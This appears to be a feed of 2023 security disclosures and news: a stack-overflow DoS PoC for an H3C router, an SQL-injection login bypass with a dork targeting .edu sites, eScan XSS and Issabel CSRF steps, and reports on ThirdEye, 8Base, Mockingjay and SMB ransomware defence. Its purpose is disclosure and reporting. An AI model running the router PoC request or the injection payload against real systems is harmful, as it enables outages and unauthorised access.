A stack overflow in the EditMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is EditMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12, v14, v15, v13 on the stack. The parameter %[^;] of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=EditMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34930: vuln/H3C_B1STW/CVE-2023-34930.md at main · h4kuy4/vuln

Alumni Club Management Tools version 2.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload  user : 'or''='@gmail.com pass : 'or''='[+] https://127.0.0.1/edu/admin.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection

By Waqas
For now, ThirdEye infostealer has demonstrated behavior that is highly malicious, albeit not-so-sophisticated in its patterns.
This is a post from HackRead.com Read the original post: Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

**While the ThirdEye infostealer is now in town, researchers have already identified several of its variants, all aiming at victims’ data.**

FortiGuard Labs uncovered a not-so-sophisticated but highly malicious infostealer while analyzing suspicious files during a cursory review. They named this ThirdEye Infostealer. According to the report authored by Fred Gutierrez, James Slaughter, and Shunichi Imano, researchers became suspicious after spotting an archive file in Russian titled “Табель учета рабочего времени.zip“, which means “time sheet” in the English language.

This file contained two additional files, both with double extensions, including a .exe extension and another document-related extension. One of these files is titled “CMK Правила оформления больничных листов.pdf.exe.”

The title means “QMS Rules for issuing sick leave” in the English language. Further investigation revealed traits that researchers had previously seen in ThirdEye infostealer samples they had been detecting since early April 2023.

**Various Versions of ThirdEye ThirdEye Infostealer Discovered**

The earliest sample of ThirdEye infostealer was discovered on 3 April 2023 at 12:36:37 GMT. This sample collected client\_hash,  OS\_type, host\_name and user\_name and sent it to C2 server “(glovatickets(.)ru/ch3ckState)” with a custom web request header: Cookie: 3rd\_eye=. It was submitted to a file scanning service on 4 April 2023.

A few weeks later, researchers found a variant which had a compile timestamp of 26 April 09:56:55 GMT. This variant collected additional data, including the BIOS vendor and release date, RAM size, CPU core number, user’s desktop files list, list of registered users on the device, and network interface data. However, this version crashes in some virtual machines.

One day later, they found a new variant with just one change: it used a PDF icon. This variant used “(ohmycars(.)ru/ch3ckState)” as C2 communications.

Later, another variant was found which gathered additional data such as total and free disk space on the C drive, domain name, network ports list, list of programs and version numbers, systemUptime, CD-ROM, drive letters volume information, currently running processes list, and programs installed in the Program Files directory.

Another file in the archive WAS titled “Табель учета рабочего времени.xls.exe,” which is a ThirdEye infostealer variant capable of performing the same activities.

Credit: FortiGuard Labs

**Functionalities of ThirdEye Infostealer**

in their blog post, FortiGuard Labs’ researchers revealed that ThirdEye Infostealer can steal system data from infected devices, including BIOS and hardware information. In addition, it can enumerate folder files, running processes, and network data.

Upon execution, the infostealer quickly gathers the data and transmits it to a C2 server hosted at “shlalala(.)ru/ch3ckState.” Apart from this, ThirdEye Infostealer does not perform any other function.

While researching, an interesting feature was noted – a string named 3rd eye, from which they derived the name of this malware family. The malware decrypts this string and uses it with another hash value to identify the C2 server. ThirdEye infostealer isn’t too sophisticated; however, it is evolving fast. Some recently collected samples stole more system data than the previously discovered versions.

Moreover, researchers noted that the infostealer targets Windows-based systems with a medium severity level. There is currently no evidence that ThirdEye Infostealer has been used in attacks.

However, since it is designed to collect data from compromised devices and systems, it can come in handy for cybercriminals in launching attacks. Researchers believe that all previous and latest variants of ThirdEye Infostealer are named in Russian, so the attacker is probably eyeing Russian-speaking organizations to deploy malware.

**RELATED ARTICLES**

1.  Legion: SMS Hijacking Malware Sold on Telegram
2.  New Jupyter infostealer dropped through MSI installer
3.  Malicious ChatGPT Installers Distribute RedLine Stealer
4.  Infostealer Adrozek malware hits Firefox, Chrome browser
5.  New MacStealer Malware Targeting macOS Catalina Devices

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023.
"The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base

Ransomware / Cyber Threat

A ransomware threat called **8Base** that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023.

"The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries."

8Base, according to statistics gathered by Malwarebytes and NCC Group, has been linked to 67 attacks as of May 2023, with about 50% of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the U.S. and Brazil.

With very little known about the operators of the ransomware, its origins remain something of a cipher. What's evident is that it has been active since at least March 2022 and the actors describe themselves as "simple pentesters."

VMware said 8Base is "strikingly" similar to that of another data extortion group tracked as RansomHouse, citing overlaps in the ransom notes dropped on compromised machines and the language used in the respective data leak portals.

"The verbiage is copied word for word from RansomHouse's welcome page to 8Base's welcome page," the researchers said. "This is the case for their Terms of Service pages and FAQ pages."

A comparison of the two threat groups reveals that while RansomHouse openly advertises their partnerships, 8Base does not. Another crucial differentiator is their leak pages.

But in an interesting twist, VMware noted that it was able to identify a Phobos ransomware that uses the ".8base" file extension for encrypted files, raising the possibility that 8Base could be a successor to Phobos or that the attackers are simply making use of already existing ransomware strains without having to develop their own custom locker.

"The speed and efficiency of 8Base's current operations does not indicate the start of a new group but rather signifies the continuation of a well-established mature organization," the researchers said. "Whether 8Base is an offshoot of Phobos or RansomHouse remains to be seen."

8Base is part of a wave of ransomware newbies entering the market such as CryptNet, Xollam, and Mallox, even as known families like BlackCat, LockBit, and Trigona have witnessed continuous updates to their features and attack chains to broaden their horizons beyond Windows to infect Linux and macOS systems.

One instance highlighted by Cyble entails the use of BATLOADER to deploy Mallox, suggesting that the threat actors are actively refining their tactics to "enhance evasiveness and maintain their malicious activities."

"Groups adopt other groups' code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware," Kaspersky said in an analysis last week. "Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that existed for some time now."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses

One ransomware attack can be devastating for a small or midsize business. Here are four solid survival tips to ensure it doesn't turn into a disaster.

If your organization is hit with a ransomware attack, it's going to cost you. According to Verizon's "2023 Data Breach Investigations Report"(DBIR), released earlier this month, the median loss to a ransomware attack has risen to $26,000 and can go as high as $2.25 million.

"\[T\]he overall costs of recovering from a ransomware incident are increasing, even as the ransom amounts are lower. This fact could be suggesting that the overall company size of ransomware victims is trending down," the DBIR team wrote.

Much of the expense comes from the loss of business and recovery time. The average ransomware attack has a life cycle of more than 300 days. That's nearly a full year in which the organization is tied up with discovery and remediation — and almost two months longer than other types of cyber incidents. And then there are other costs to factor, such as long-term damage to the corporate brand and reputation, as well as loss of institutional knowledge when the employees who are held responsible for the attack are let go.

The costs surrounding a ransomware attack could cripple small and midsize businesses (SMBs) and even cause one to shut down. But it doesn’t have to be that way. Even for SMBs with tight IT/security budgets and limited security expertise, ransomware protection and recovery boils down to planning ahead.

The best way to avoid the high costs of a ransomware attack is to avoid being a victim, but protection and detection tools also come with hefty price tags. How much a company will need to pay depends on the number of employees and devices it needs to protect, but even a company with as few as 50 people can spend five figures on ransomware protection. Cyber insurance to protect the business in case of an attack could add at least $1,500 per $1 million in coverage, depending on the deductible.

Note that getting cyber insurance for ransomware is not easy; many insurance agencies are limiting coverage because of the high payout costs.

Organizations also need to think about the cybersecurity approach they want to take. How cybersecurity teams approach ransomware defense has changed over the years, says PJ Kirner, CTO and co-founder of Illumio. Cybersecurity has shifted from perimeter defense (setting up a secure perimeter to keep the bad guys out), to rapid detection (detecting and stopping as quickly as possible), to containment (limiting the amount of damage the attackers can cause once they break in).

Which approach an SMB decides to take determines the type of tools and protective actions it will need. A company deciding to contain malware would make investments to beef up authentication and privilege management in order to validate all users and devices before granting access to any transaction. A company focused on perimeter defense would have very different investments, requiring firewalls and other methods to keep attackers out of the network.

While an organization can adopt any number of security systems and tools, SMBs should consider the following actions, regardless of their overall security approach.

**1\. Decrease the Attack Surface**

Applying the concept of least-privilege access can close the door against ransomware attacks. The fewer people with access to applications and databases, the lower the chances for cybercriminals to also gain access and get in. Audit your users' roles to make sure they have access only to the software and services they need, especially if the software processes sensitive data.

For example, explains Kirner, Remote Desktop Protocol (RDP) is a popular access point for threat actors to get into a Windows system and launch ransomware. But RDP is most often used for IT help desks and troubleshooting. Most employees across the business have no need to have RDP accounts, yet they might have RDP enabled on their machines. Kirner advises revoking access if employees have no reason to have those accounts.

"Remove all that attack surface from your environment," Kirner says. "This is something you can do proactively and reduce the impact of ransomware."

Also worth disabling — especially in a Windows environment — is PowerShell. Attackers are increasingly using PowerShell in malware-less attacks. The average user is never going to use it, so it's better to disable it when setting up the user machine. Similarly, keep track of what accounts have been created on the network or for cloud applications and services. If the employee no longer needs it or has left the company, remove that account entirely. Cloud access security broker software can help manage and monitor employees’ cloud activity and enforce security policies.

**2\. Shift the Costs to the Attackers**

Another way to make your organization less attractive to bad actors is to make launching an attack more costly for the cybercriminal. Something as simple as restricting access to unnecessary applications shifts the burden to the attacker. If the attacker can’t do much with the application despite having user credentials — maybe they can only view reports but can’t extract data — the attacker has a choice of moving on to easier victims or working harder. Similarly, requiring multifactor authentication adds another roadblock for threat actors because just stealing credentials is no longer enough. Many types of MFA can fit an SMB's budget and security expertise, including biometrics, hardware tokens, and even the employee’s phone.

Attackers are economic actors, just like any other business, Kirner points out. "When they run out of time, they'll go to an environment with less security controls," he says.

**3\. Improve Your Security Hygiene**

Good security hygiene is important, regardless of company size.

The first step is to build an internal security culture around cybersecurity awareness and guidance, explains Dave Gerry, CEO at Bugcrowd. That doesn’t just mean watching security videos and calling it a day. Encourage open communications and give employees the confidence to report anything that seems suspicious.

Explain which external services and resources are allowed and why there are restrictions. Make it easy for employees to go through an approval process for getting access to tools so that they aren’t just going off and creating their own accounts.

Use modern training materials. Security companies are now producing training videos that are episodic, like sitcoms, or use techniques from reality shows that entertain as well as educate.

Gamification, such as setting up contests or offering rewards when designated milestones are met, also creates an environment where employees want to improve their security practices. Human error is a top cause of cyberattacks. When employees are encouraged to take an active role in cybersecurity and understand the consequences when they don't, you add another cybersecurity tool at little cost.

**4\. Don't Fail to Plan**

Prevention is important, but every organization should have a plan in place to mitigate an attack when it happens. The company should know who will be involved in mitigation and recovery, as well as how to handle the negotiations.

For example, because of the possibility that a ransomware attack can lead to permanently shutting down an SMB, many plan to pay the ransom. That requires setting a budget on how much to pay. If the organization does not already have a cryptocurrency wallet or access to cryptocurrency, that will make payment a bit difficult. SMBs are already working with managed service providers, consultants, and contractors. It may be worth lining up a ransomware negotiator ahead of time, who can spring into action when needed. The same goes for a computer forensics team to help figure out what is happening on the network and how to remove the ransomware.

Priority No. 1 has to be a strategy, says Joseph Carson, chief security scientist at Delinea. A ransomware attack isn't a typical incident, he points out. It will make you unavailable to your customers and, in worst-case scenarios, put lives at risk. No matter how small your budget, it is essential to think about what ransomware defense should look like but to also plan out what is needed for a successful recovery.

Protecting Small Businesses From Ransomware on a Budget

By leveraging misconfigured DLLs instead of EDR-monitored APIs, this new technique injects malicious code into running processes, completely evading endpoint security.

Endpoint detection and response (EDR) systems have become increasingly efficient at detecting typical process injection attempts that invoke a combination of application programming interfaces to insert code into the memory space of a running process.

So researchers at Israeli-based Security Joes set out to find another way to due process injection without relying on EDR-monitored APIs. The result is Mockingjay, a novel method for process injection that leverages dynamic link libraries (DLLs) with default read, write, and execute (RWX) permissions to push code into the address space of a running process.

**The Mockingjay Approach**

The approach reduces the likelihood of an endpoint security mechanism detecting a malicious process injection effort and requires a smaller number of steps to achieve, Security Joes said in a report this week. "Our research aimed to discover alternative methods to dynamically execute code within the memory space of Windows processes, without relying on the monitored Windows APIs," the security firm said.

"Our unique approach, which involves leveraging a vulnerable DLL and copying code to the appropriate section, allowed us to inject code without memory allocation, permission setting, or even starting a thread in the targeted process."

Process injection is a technique for manipulating the memory of a process to either add new functionality or modify its behavior. Attackers commonly use the method to hide malicious code and evade detection on compromised systems. Common process injection methods include self-injection where a process that receives the injected payload also executes it; DLL injection where a malicious DLL is loaded into the memory space of a process; and PE injection where a portable executable file is mapped into the memory of a running process.

"Each of these injection techniques requires a set of specific Windows APIs, which generate characteristic patterns that can be leveraged by defenders and security software for detection and mitigation purposes," Security Joes said in its report. For instance, the APIs required for self-injection are VirtualAlloc, LocalAlloc, GlobalAlloc, and Virtual Protect, the company said. Similarly, the APIs used in PE injection are VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Most EDR systems are tuned to monitor commonly used APIs in process injection attacks and can effectively identify malicious activity associated with their use.

**Abusing Vulnerable DLLs**

The strategy Security Joes used in developing Mockingjay was to systematically search for DLLs within the Windows OS that contained a default RWX section. Researchers at the company developed a tool that explored the entire Windows file system to identify DLLs that could serve as potential vehicles for code injection without triggering an EDR alert. The exploration resulted in Security Joes finding a DLL (msys-2.0.dll) with 16KB of RWX space in Visual Studio 2022 Community that they could use for injecting and executing their own code.

"After identifying the vulnerable DLL that contains a default Read-Write-Execute (RWX) section on disk, we conducted several tests to explore two different methods that could leverage this misconfiguration to execute code in memory," Security Joes said.

One method was to directly load the vulnerable DLL into the memory space of a custom application called nightmare.exe that Security Joes developed. Doing that allowed researchers to inject and execute their own shellcode into the memory space of the application without leveraging any Windows APIs. Among other things, the shellcode also removed all EDR hooks without triggering any alerts. "This complete removal of dependency on Windows APIs not only reduces the likelihood of detection but also enhances the effectiveness of the technique," the company said.

Security Joes' second tactic for abusing the RWX section in the DLL was to do process injection in a remote process. To achieve this, they first identified binaries that used mysys-2.0.dll for their operations. Many of these were associated with GNU utilities and other applications that require POSIX emulation. For the proof-of-concept, researchers chose the ssh.exe process in Visual Studio 2022 Community as the target for injecting their code. "It is important to note that in this injection method, there is no need to explicitly create a thread within the target process, as the process automatically executes the injected code," the company explained.

According to Security Joes, the DLL that its researchers used to developed Mockingjay is just one of potentially many others that can similarly be abused for code injection purposes. Addressing the threat requires endpoint security tools that don't just monitor specific APIs and DLLs but also use behavioral analysis and machine learning techniques to identify process injection.

Mockingjay Slips By EDR Tools With Process Injection Technique

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a vulnerable parameter GrpPath.

**eScan Management Console 14.0.1400.2281 - Reflected Cross Site Scripting**

**Description:** Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a vulnerable parameter GrpPath .

**Vulnerable Product Version:** 14.0.1400.2281

**Date:** 23/06/2023

**CVE:** CVE-2023-34837

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.escanav.com

**Software Link:** https://cl.escanav.com/ewconsole.dll

**Tested on:** Windows

**Steps to reproduce:**

1.  Login into the eScan Management Console with a valid user credential. Here, escan management console is on internal network.
    
2.  Navigate to "Unmanaged Computers >> Network Computers" feature.
    
    ****
3.  Capture the POST request in burpsuite and inject the XSS paylaod into "GrpPath" parameter as shown in fugure below.
    
    ****
4.  After forwarding the request, an XSS alert will pop up with user session cookie.

CVE-2023-34837: CVE-2023-34837/README.md at main · sahiloj/CVE-2023-34837

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter.

**eScan Management Console 14.0.1400.2281 - Stored Cross Site Scripting**

**Description:** Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Description parameter.

**Vulnerable Product Version:** 14.0.1400.2281

**Date:** 23/06/2023

**CVE:** CVE-2023-34838

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.escanav.com

**Software Link:** https://cl.escanav.com/ewconsole.dll

**Tested on:** Windows

**Steps to reproduce:**

1.  Login into the eScan Management Console with a valid user credential. Here, escan management console is on internal network.
    
2.  Navigate to url http://192.168.1.1:10443/ewconsole/ewconsole.dll/NewRole and inject the XSS paylaod in description parameter.
    
    ****
3.  Select any group and save the new role detail. A XSS alert will pop up which can be also modified to extract admin session cookie.
    
    ****

CVE-2023-34838: CVE-2023-34838/README.md at main · sahiloj/CVE-2023-34838

A Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via a crafted script to the Dtltyp and ListName parameters.

**eScan Management Console 14.0.1400.2281 - Reflected Cross Site Scripting**

**Description:** Cross Site Scripting vulnerability in Microworld Technologies eScan Management console v.14.0.1400.2281 allows a remote attacker to execute arbitrary code via vulnerable parameters like Dtltyp and ListName.

**Vulnerable Product Version:** 14.0.1400.2281

**Date:** 23/06/2023

**CVE:** CVE-2023-34836

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.escanav.com

**Software Link:** https://cl.escanav.com/ewconsole.dll

**Tested on:** Windows

**Steps to reproduce:**

1.  Login into the eScan Management Console with a valid user credential. Here, escan management console is on internal network.
    
2.  Navigate to "User Activity >> File Activity Report" feature.
    
    ****
3.  Capture the GET request in burpsuite and inject the XSS paylaod into "Dtltyp" and "ListName" parameter as shown in fugure below.
    
    ****
4.  After forwarding the request, an XSS alert will pop up which could be modified to extract user session cookie as well.

CVE-2023-34836: CVE-2023-34836/README.md at main · sahiloj/CVE-2023-34836

A Cross Site Request Forgery (CSRF) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via a Custom CSRF exploit to create new user function in the application.

**issabel-pbx 4.0.0-6 - Cross Site Request Forgery (CSRF) to Privilege Escalation###**

**Description:** Cross Site Request Forgery vulnerability in Issabel issabel-pbx v.4.0.0-6 allows a remote attacker to gain privileges via the a Custom CSRF exploit to create new user function in that application.

**Vulnerable Product Version:** issabel-pbx 4.0.0-6

**Date:** 23/06/2023

**CVE:** CVE-2023-34839

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.issabel.org/

**Software Link:** https://github.com/IssabelFoundation/issabelPBX

**Tested on:** Windows

**Steps to reproduce:**

1.  Go to issabel PBX application and login with admin credentials.
    
    ****
2.  Copy the CSRF exploit shown below and save into html file and change the hostname or domain name which is masked in the exploit for personal reason.
    
    ****
3.  Open the CSRF exploit file in the same browser in another tab and as you can see a new user named "CSRF" was direclty created into the admin panel with administrator privilege.
    
    ****

Tag

#windows